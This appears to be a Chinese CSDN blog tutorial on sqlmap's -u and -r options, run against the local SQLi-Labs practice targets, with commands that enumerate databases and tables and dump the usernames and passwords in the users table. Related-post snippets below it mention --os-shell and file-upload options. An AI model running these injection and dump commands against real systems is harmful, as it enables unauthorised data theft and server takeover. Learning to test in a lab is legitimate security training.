sqlmap -u -r参数的使用

已于 2022-03-16 10:22:34 修改
阅读量1w 收藏 17
点赞数 4
文章标签: sql 数据库 database
于 2022-03-15 14:56:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52072846/article/details/123479053
版权

SQLMAP基本使用实例

-u参数(直接输入目标URL)

命令实例:sqlmap -u "http://127.0.0.1/sql/Less-1/?id=1"
验证过程
判断可注入的参数
判断可以用哪种SQL注入技术来注入

识别出所有存在的注入类型
尝试去判定数据库版本、开发语言、操作系统版本

目标靶机:SQL-Lab的Less-1
要求:利用SQLMAP实现注入,获取users表中存储的用户名、密码

-u参数的用法:

爆当前数据库的库名

sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --current-db

 

 爆指定数据库中的表名

sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D 表名 --tables

sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security --tables

 

爆指定数据表中的字段名

sqlmap -u "http://127.0.0.1/Less-1/?id=1" -D 数据库名 -T 表名--columns

sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security -T users --columns

爆指定字段的值

sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D 数据库名 -T 表名 -C 字段名1,字段名2... (相互用逗号隔开)--dump

sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security -T users -C username,password --dump

 

2.-r参数(从文本文件中获取http请求)
命令实例: sqlmap -r /usr/a.txt
说明:使用该命令时须指明a.txt(保存着http请求包)文件所在的绝对路径验证过程:与-u参数类似
判断可注入的参数
判断可以用哪种SQL注入技术来注入

识别出所有存在的注入类型
尝试去判定数据库版本、开发语言、操作系统版本

目标靶机: SQLi-Lab的less-12
要求:利用SQLMAP实现注入,获取users表中存储的用户名、密码

利用Burpsuite截取HTTP Request报文

 将截取到的HTTP Request报文保存在文本文件中

 利用SQLMAP对该文本文件中涉及的目标网站进行注入——爆当前数据库的库名
sqlmap.py -r D:\python\a.txt  --current-db

 利用SQLMAP对该文本文件中涉及的目标网站进行注入——爆指定数据库的表名

sqlmap.py -r D:\python\a.txt  -D security --tables

 

 利用SQLMAP对该文本文件中涉及的目标网站进行注入——爆指定数据表的字段名

sqlmap.py -r D:\python\a.txt -D security -T users --columns

 利用SQLMAP对该文本文件中涉及的目标网站进行注入——爆指定字段的值

sqlmap.py -r D:\python\a.txt  -D security -T users -C username,password --dump

 

 

江月未来
关注
  • 4
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
sqlmap-1.6.5-11 sql注入工具
sqlmap常用基础命令
m0_73826804的博客
02-21 386
-os-cmd,--os-shell 运行任意操作系统命令(仅支持MySQL、PostgreSQLSQL Server)--file-write "本地文件路径" --file-dest "远程绝对路径" 上传文件到数据库服务器中。--sql-shell 运行自定义SQL语句 用法:sqlmap -u url --sql-shell。sqlmap -u url -D 数据库名 -T 表名 --columns #列出字段。sqlmap -u url -D 数据库名 -T 表名 --dump。
SQLmap的常用命令
qq_45174221的博客
03-21 133
sqlmapsql注入攻击的自动化工具,相比手动注入能有效的缩短注入的时间
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
03-13 1129
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。会清空之前的session,重新测试该目标。
sqlmap命令
这里是Y.lin的博客,目前是一名网络安全专业的学生,希望和师傅们一起进步吧!
10-17 56
如何掌握sqlmap
sqlmap(基础指令)
weixin_45291045的博客
02-01 220
常用指令 -D指定库 -T指定表 -C指定字段 1, -u 指定注入点 python sqlmap.py -u "http://127.0.0.1:8003/?id=1" 2, --dbs 跑库名 python sqlmap.py -u "http://127.0.0.1:8003/?id=1" --dbs 3, --tables 跑表名 python sqlmap.py -u "http://127.0.0.1:8003/?id=1" -D 要查询的库名 --tables 4, --column
SQLmap使用总结
Alexz__的博客
02-15 2829
1.简介 2.说明书翻译 3. 基础命令汇总 4.基础命令尝试 5.高级用法 壹 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQLSQLServer、IBM DB2、SQLite、Firebird、Sybase和...
sqlmap使用详解
weixin_59246157的博客
04-21 1585
id=1" -D security -T users -C username --dump --start 1 --stop 100 #爆出数据库security中的users表中的username列中的前100条数据。
sqlmap的用法,sqlmap -r
litiammmm的博客
07-15 6438
sqlmap结合burpsuit进行sql注入漏洞查找; 配置好burpsuit和浏览器之间的代理,网上方法很多,创建一个记事本,准备写入参数使用; 1、在sqlmap根目录下创建list.txt,你也可以在其他地方创建,待会协商目录就行; 2、打开需要测试sql注入的网站,并用burpsuit进行抓包,主要关注有参数传递的链接,如下图这种: 3、符合图中Raw中的所有信息写入刚创建的txt中 4、执行sqlmap扫描命令 sqlmap -r list.txt --level..
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4443
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场
m0_65336233的博客
10-09 1395
WEB攻防-通用漏洞&SQL注入
sqlmap-1.4.5.zip
05-22
sqlmap-1.4.5,亲爱的朋友,SQLMAP是自动化的SQL注入和数据库接管工具,是开源的渗透测试工具,它能自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的...
sqlmap-master
06-23
sqlmap
sqlmap-master.zip
11-05
sqlmap
sqlmap-gtk:使用PyGObject(gtk + 3)的sqlmap GUI
05-24
sqlmap-gtk sqlmap GUI,使用PyGObject(gtk + 3) 支持linux,在Mint 20上测试,kali 2020.4 上的 ,需要改进。 sqlmap具有python3的端口。 请不要再使用python2了。截屏如何先决条件python3.6 +,GTK + 3.20以上...
如何在Android应用中安全地使用SQLite数据库,并通过SQLCipher进行加密保护
轻描时光
04-23 73
Android内置SQLite轻量级关系型数据库,可以在Android应用中存储、检索和管理结构化数据。SQLite是一个无服务器的、零配置的、事务性的SQL数据库引擎,非常适合用于移动设备和桌面应用程序中。:SQLite不需要单独的服务器进程或操作系统级别的配置。可以直接读写磁盘上的文件,非常高效且适合在资源有限的移动设备上使用。:SQLite支持ACID事务,提供了原子性、一致性、隔离性和持久性。保证了即使在发生故障的情况下,数据的完整性也能得到维护。
sql将日期区间拆分为多行
最新发布
chinacmt的博客
04-25 110
日期拆分
如何写好SQL
jiangchao98的博客
04-23 1054
split函数返回的结果是一个数组类型,因此在进行一些操作时需要将其转换为其他适合的数据类型,例如字符串或结构体等。使用Hive中的LATERAL VIEW关键字来进行表的展开操作,并将展开的结果作为一列结果集中的元素。【解析 json 的字符串 json_string, 同时指定多个 json 数据中的 column,返回对应的 value。如果输入的 json 字符串无效,结果返回 NULL】在 Hive 中,array_join 函数用于将一个数组中的元素按照指定的分隔符连接成一个字符串。
SQL的基础语句
qq_51321722的博客
04-22 930
因此在写子查询语句时,可以先测试下内层的子查询语句是否输出了想要的内容,再一层层往外测试,增加子查询正确率。使用SELECT查询时,如果结果集数据量很大,比如几万行数据,放在一个页面显示的话数据量太大,不如分页显示,每次显示100条。上述查询LIMIT 3 OFFSET 0表示,对结果集从0号记录开始,最多取3条。包含左边表的全部行(不管右边的表中是否存在与他们匹配的行),以及右边表中全部匹配的行。包含右边表的全部行(不管右边的表中是否存在与他们匹配的行),以及左边表中全部匹配的行。
sqlmap -r --dbs
09-03
`-r` 参数表示使用从请求文件中获取的数据进行注入测试。`--dbs` 参数表示获取数据库的名称。 请注意,我是一个聊天AI助手,无法执行实际的命令或运行代码。如果你有任何其他问题,我会很乐意回答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值